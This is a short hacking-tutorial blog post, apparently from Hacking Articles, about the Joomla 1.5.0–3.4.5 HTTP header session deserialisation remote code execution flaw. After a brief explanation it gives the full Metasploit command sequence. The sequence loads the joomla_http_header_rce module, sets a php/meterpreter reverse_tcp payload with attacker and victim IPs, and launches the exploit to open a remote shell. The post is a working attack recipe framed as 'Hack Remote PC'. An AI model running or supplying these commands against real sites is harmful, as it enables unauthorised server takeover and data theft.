Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it’s possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.
Exploit Targets
Joomla 1.5.0 – 3.4.5
Requirement
Attacker: kali Linux
Victim PC: Joomla 3.4.5
Open Kali terminal type msfconsole
Now type use exploit/multi/http/joomla_http_header_rce
msf exploit (joomla_http_header_rce)>set payload php/meterpreter/reverse_tcp
msf exploit (joomla_http_header_rce)>set lhost 192.168.0.106 (IP address of kali Linux)
msf exploit (joomla_http_header_rce)>set targeturi /joomla/
msf exploit (joomla_http_header_rce)>set rhost 192.168.0.104 (IP of Remote Host)
msf exploit (joomla_http_header_rce)>set rport 80
msf exploit (joomla_http_header_rce)>exploit
The post Hack Remote PC using Joomla HTTP Header Unauthenticated Remote Code Execution appeared first on Hacking Articles.